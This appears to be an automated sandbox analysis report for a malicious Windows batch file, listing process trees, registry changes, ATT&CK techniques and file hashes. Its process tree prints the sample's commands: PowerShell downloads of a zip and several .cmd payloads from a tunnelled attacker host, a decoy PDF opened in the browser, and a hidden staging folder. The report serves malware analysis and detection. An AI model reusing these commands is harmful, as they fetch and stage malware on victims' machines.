56bf257d93c8797219d10fcc94e0ffee4859109c8799a925f828126f1e9b12d0

Analysis

max time kernel
1800s
max time network
1565s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
23-05-2024 18:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

new.cmd
Size

3KB
MD5

33096706975d44c7b99a1f9f49c2a8b8
SHA1

9d1af5a90bb43181b486fcdd530bb076e86ea319
SHA256

56bf257d93c8797219d10fcc94e0ffee4859109c8799a925f828126f1e9b12d0
SHA512

18d11d3aa0470e651529a60cba53a1d33c7cd8e2eec4d76cada3f7af5829a8c59ec3e2d37262e62b9d5dad9f133e1c46e3322fb27ca5a5fd8882a4ee4ccaa56a

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2660 powershell.exe
1540 powershell.exe
1288 powershell.exe
2636 powershell.exe
2660 powershell.exe
1372 powershell.exe
3024 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

2636 timeout.exe
1620 timeout.exe

pid	process
2660	powershell.exe
1540	powershell.exe
1288	powershell.exe
2636	powershell.exe
2660	powershell.exe
1372	powershell.exe
3024	powershell.exe

pid	process
2636	timeout.exe
1620	timeout.exe

Modifies Internet Explorer settings 1 TTPs 40 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEIEXPLORE.EXEiexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b0f756db815c654b9a16fa973a25a40700000000020000000000106600000001000020000000e490a3f0df8f0f3935cb84d575c32a4e5408ac6a1314c7527d02548e6cd282ba000000000e8000000002000020000000de2194244262607ad8d2bca26f5cf0503bcf0f0bfc0759ded57145410232faba300200003064c6f6c5e4ae048898f729f53e9336711e2e6a96d848d23fba3edb39c8a5e24d38fb8f63c9324ecd2ca64d30b859ca4bb8943ba2b799ab0f9eaa9e04335d6a68b1b9669f8fc99b255cecd11912eeea5b06145145f553c90e65c6282a12e1ba98c8e6636e7dc03c290dd8ab8d521f73955b8ccad91c7da0992a08a078b51caaf702c165b6c8a17fc29a513d9fd8cb1d15e14b4b3138f27a7d1b348339fd6625b52cad42023de529f9f1fdc74ddc641ca5e0872ac16e6bba69daf239e401661d913c907759dfc6437c6b6c93311b9d62c12b06e009a027a1dd4a4230d1376c81021d91a0ab7fd26497e02098ad9c602a4fedd4d1865ac643ee953a155f272271019539c0de9dfe7e18b3371d9bbcf19bc080894e2fe4b42f335d1f342f730c5ff0a444b1f07a98381a6f7c80d2875c0447715fa19406cd4446cc2be67b10e3f1f5f9ed25d5dc7354f5a201bcf7b0aa1628ee028b009158e1eec76bae1fd1ee645a8b13a20667ff71de81e2656aaeea594ae753e5337afd3fc44b7477be4e0f23534d70f30ce9ab6a5e2ad62958252cf7472048c819f0e9813e15f85442822f4060dd2f6611d90ea9c90f7777af35bfe0ad36a71491c88b3d9818d5079ab10954cea8d405f5ff58945ae663976d48efed939eb413a70080bb47b2ac516b953b9a01835d00bfad726a2f68c9c74537cbd97100288f7e511d1df4ac14e71bf544e8a9bd221a7a023eb2e87072e107a8bc3bb45d9b552aa8d68b264b13ba951c77cecd564477032ae78b96ddda1e368a18e740000000da401fd633758e134ec9ddcd258492359b5a70e1cc49d41abd01008ae15812bebdd1108ee6c61ef5acac534fd1714e2c20f9004fd322737d3db77d455cbd4c74	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{272C9391-1933-11EF-AFF6-E61A8C993A67} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70a179ec3fadda01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "422651167"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b0f756db815c654b9a16fa973a25a407000000000200000000001066000000010000200000004c7dcb760514d3fd45fde93e196b725a6ac04b963af9975a87ffc23ab91522cd000000000e80000000020000200000006e768afae8c67000fd2736d5fa086e3f399ef2857f561f39c51116b0bde289d420000000bc49d429e494057f2df230b8a200540a23cdc9b7bb9bccb65a1868e550a19c93400000006ee50ad1f9a7cc1a8d0f145edd3a6a0961aeddbe8c1f731036cdb2d0c87b637bf8eb0edbd81dd249943e16697d3c484d01fac6094759b50822ae6088e0e315ea	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b0f756db815c654b9a16fa973a25a4070000000002000000000010660000000100002000000034d8b3f5e7ae2e907b838736cd584a45f84f438e27e7f1ccb442cf4f8c9602a9000000000e8000000002000020000000025f301a04fdffdceeb7091460e10adca586621380103631bbd98d58b8c2c0d83002000065a967015b90f75ed08d46fd9d6dbe8369aa8a2453fa350a7905dbc8a429b2312cf4deeb4ad81e6170dce09e170d87a0807ff8c1ac6a754ff0535b8a4f13f0fe4a90ddc07c52b296ca434d33767f2aa60cdf6ad73a4e86227b75047d48bd29c9a8d103e40c7a078c9e4de4891c6381dbf915703698f149feef38bfb6546da832c4d695055f774d7684b5b9dcaafef58b86a5b716beab614d514348238e78b198bb1aafa0bdf4a21de4e2b1ec86f1d89ee7708fe84fdf47cbbe71bfbc4b92ce857068062d92e9d6d4a311b507a28f7ac5259dd67205b32a25d307ba80b0e50634f2ba647e40591586c2f8250b5d669d68d18ba4fc2061cb4ed86b56e3fa2e3768ca9fb44a127844c5a621143987699b065822f878a56be9676e60e4042630e5a2559fbd80689bbf0f0b54071153c812f4c5938017a8f32018d92a2cd065cfc38b92a605101aa81d18fd9d884ee92f703d85198a7cffaeda73e9f2f8e741016804bf43e4bf9ff7702357d89b6ab6480f70fcc0d2d8d4bd973fb306257e1ada6c3b0999a7638e69b294abc6b0ef607f8aece65cc699e8af3dc52129f69be58fbafce5adbb83ebac36928d538cca457c3deb9984ec1e6af87d166ef91fa9d3e3dd6a3687f106b87d6f17985369a0e98dd2a4171192d9c1f7917452043d3dd52df929d2694216cdf85d58ed2e1908afb59515ed598f3c1d780218f3ce633541b1d451aaefc4cff7c5bea3064dd55e196ac62e5d400b27207aca8704d4f0ad2957842c5e65ed986e0c0e66bad9e996eef1a7124000000051ed4752752684309c6e05480f3d92238385233f91b3debfb9a9dc01ccee8f2529cf2b7ff1aa62e05d5e81fe4fbe0ccaec3409b61e4212e041792abb7db67d19	iexplore.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2660 powershell.exe
3024 powershell.exe
1540 powershell.exe
1288 powershell.exe
2636 powershell.exe
2660 powershell.exe
1372 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

IEXPLORE.EXEIEXPLORE.EXE

pid process

1784 IEXPLORE.EXE
3064 IEXPLORE.EXE

pid	process
2660	powershell.exe
3024	powershell.exe
1540	powershell.exe
1288	powershell.exe
2636	powershell.exe
2660	powershell.exe
1372	powershell.exe

pid	process
1784	IEXPLORE.EXE
3064	IEXPLORE.EXE

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2660	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	2660	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

2500 iexplore.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

pid	process
2500	iexplore.exe
2500	iexplore.exe
3064	IEXPLORE.EXE
3064	IEXPLORE.EXE
1784	IEXPLORE.EXE
1784	IEXPLORE.EXE
3064	IEXPLORE.EXE
1784	IEXPLORE.EXE
1784	IEXPLORE.EXE
3064	IEXPLORE.EXE
1784	IEXPLORE.EXE
1784	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

cmd.exeiexplore.exe

description	pid	process	target process
PID 2312 wrote to memory of 2500	2312	cmd.exe	iexplore.exe
PID 2312 wrote to memory of 2500	2312	cmd.exe	iexplore.exe
PID 2312 wrote to memory of 2500	2312	cmd.exe	iexplore.exe
PID 2312 wrote to memory of 2636	2312	cmd.exe	timeout.exe
PID 2312 wrote to memory of 2636	2312	cmd.exe	timeout.exe
PID 2312 wrote to memory of 2636	2312	cmd.exe	timeout.exe
PID 2312 wrote to memory of 2660	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 2660	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 2660	2312	cmd.exe	powershell.exe
PID 2500 wrote to memory of 3064	2500	iexplore.exe	IEXPLORE.EXE
PID 2500 wrote to memory of 3064	2500	iexplore.exe	IEXPLORE.EXE
PID 2500 wrote to memory of 3064	2500	iexplore.exe	IEXPLORE.EXE
PID 2500 wrote to memory of 3064	2500	iexplore.exe	IEXPLORE.EXE
PID 2312 wrote to memory of 3024	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 3024	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 3024	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 1620	2312	cmd.exe	timeout.exe
PID 2312 wrote to memory of 1620	2312	cmd.exe	timeout.exe
PID 2312 wrote to memory of 1620	2312	cmd.exe	timeout.exe
PID 2500 wrote to memory of 1784	2500	iexplore.exe	IEXPLORE.EXE
PID 2500 wrote to memory of 1784	2500	iexplore.exe	IEXPLORE.EXE
PID 2500 wrote to memory of 1784	2500	iexplore.exe	IEXPLORE.EXE
PID 2500 wrote to memory of 1784	2500	iexplore.exe	IEXPLORE.EXE
PID 2312 wrote to memory of 1540	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 1540	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 1540	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 1288	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 1288	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 1288	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 2636	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 2636	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 2636	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 2660	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 2660	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 2660	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 1372	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 1372	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 1372	2312	cmd.exe	powershell.exe
PID 2312 wrote to memory of 2836	2312	cmd.exe	attrib.exe
PID 2312 wrote to memory of 2836	2312	cmd.exe	attrib.exe
PID 2312 wrote to memory of 2836	2312	cmd.exe	attrib.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

2836 attrib.exe

pid	process
2836	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\new.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2312

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://floor-contemporary-genius-accommodation.trycloudflare.com/VB.pdf
2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2500

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2500 CREDAT:275457 /prefetch:2
3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3064

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2500 CREDAT:275463 /prefetch:2
3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1784

C:\Windows\system32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
2⤵
- Delays execution with timeout.exe
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Windows\system32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
2⤵
- Delays execution with timeout.exe
PID:1620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/update.cmd' -OutFile 'C:\Users\Admin\Downloads\update.cmd' }"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/las.cmd' -OutFile 'C:\Users\Admin\Downloads\las.cmd' }"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/xff.cmd' -OutFile 'C:\Users\Admin\Downloads\xff.cmd' }"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/zap.cmd' -OutFile 'C:\Users\Admin\Downloads\zap.cmd' }"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/kam.cmd' -OutFile 'C:\Users\Admin\Downloads\kam.cmd' }"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\Downloads\Python"
2⤵
- Views/modifies file attributes
PID:2836

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1495DD322A24490E2BF2FAABAE1C61
Filesize
299B

MD5
5ae8478af8dd6eec7ad4edf162dd3df1

SHA1
55670b9fd39da59a9d7d0bb0aecb52324cbacc5a

SHA256
fe42ac92eae3b2850370b73c3691ccf394c23ab6133de39f1697a6ebac4bedca

SHA512
a5ed33ecec5eecf5437c14eba7c65c84b6f8b08a42df7f18c8123ee37f6743b0cf8116f4359efa82338b244b28938a6e0c8895fcd7f7563bf5777b7d8ee86296

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
Filesize
914B

MD5
e4a68ac854ac5242460afd72481b2a44

SHA1
df3c24f9bfd666761b268073fe06d1cc8d4f82a4

SHA256
cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

SHA512
5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
41d247997ff4b8b68df09d32bbe65f5c

SHA1
a4aec304ab2488a8d8745099f5eb6ce847720f97

SHA256
18242c5dd3b9751dfab98512bb3e0e7e0f6c3232e7cc8ee6b024b6033fc0b4e4

SHA512
65c5d34f7dbf1c95edcf7749fd870dfaada7fd96e66f1c17bf8112446ccc02a94e1e45b28a48215a3a67b93241fb79927cb59d9e246adb4db158fbbf94a83dc8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1495DD322A24490E2BF2FAABAE1C61
Filesize
192B

MD5
b27c914cb41ddc0c62430abb0e7c989a

SHA1
a30fa492bb5230a804830a26e9aa36805636a025

SHA256
b2df4c26c17b598750059731fb90a36f044db1ccb3edf5555ca404127097de94

SHA512
f8ba9a71088ffac23c89797a2f4b79809369c1b969fd3b834f3889657d419e7c0d240b9fea0233358b6b372b39fbcc81dceafa403a073788d76d2007c5e42d88

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
Filesize
252B

MD5
56827a0d7736700889fdf699f5b2116b

SHA1
61f3124f344155c5ee08dd331d28bbf80529f240

SHA256
a877081a6dea94c6534de937b5e9a8ff012eb935786e091799dae6d27efb4497

SHA512
0483a3408331e240e4211ba7cae4f1faf7aba9531a085773a32dde0e9794b327f8b25e3456eca4253df959345239e4421c3d6db285f9a24d34fdd7401c8b48da

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
85f11af5e137746d2cb858d12bfa9991

SHA1
07853321fb415a033a424a0e51d42d34e5dc69e6

SHA256
9433148b79013c46dd2d86d29debfa463bb8d1a777ed26569c7934eadde5cfd1

SHA512
1d2a0b9e4dcadbd218de4541f1831b9e355e06206c6563e26d535ec557f5f6632d4f2dbf845b07aaa6153bb57fec62934d327068e26d707617cd23a08ce58b26

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
c7edb8569ef845eaf0f678b31e4aabe3

SHA1
339fe1a92d8117ae43eaa4aa53c2ec51a3df8cff

SHA256
c76708c738c78e26bfd74cea9cb7a5cd1e2a343a1304765948b1f4eea6bb7d9d

SHA512
c1de74545ab7ec821d0503aadfa24ed6f5fcf2044d70dc91d362e44f631928655c15ce5fed74023a408e18fe394b9f3a8608c9341d8330c03ab46177a3d9993d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
14c3489eccdb450d457d9591173bb31b

SHA1
b196cc1599ccdfa16c1a71bfc2870e47c101fb21

SHA256
58dec1abdb13c3f8b9c47223c25e439b1e324bde177abb7faf5cfa2841729746

SHA512
5646043892bde550a1ce95b40d9055fa725cbfea34922bfcfc96de1f7a351000bbfb2b268825b7628774b279f398eee9097880412fe060131a8ed1e54ab5887a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
a3ec0ff43a843fd2c07d1a3bbdbe3df3

SHA1
3d47240d5ad4c4f44c930b5d114781111275fafa

SHA256
24c2bc46454199dbedd8e15d8d14fb7f63e6938e779a150f6a61b83bb9e81b05

SHA512
3fcfa0a2a1ca203c3467703f2a5c84a14788e79dd5fbebe8b5fa7874c677d804307d3fe4aed7efc6b0973da929618c1267caa7ccd6b9f36d4db7ae9b33a33040

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
008947d9c165ec8fbd6058a2bc6dc47e

SHA1
420aa14bef8518b1d0090c3ae050b18b92ba40ca

SHA256
2bdcb2d805742b5b83cd0a2103f4af6a024af307429bf30ce4ce654bee5580fb

SHA512
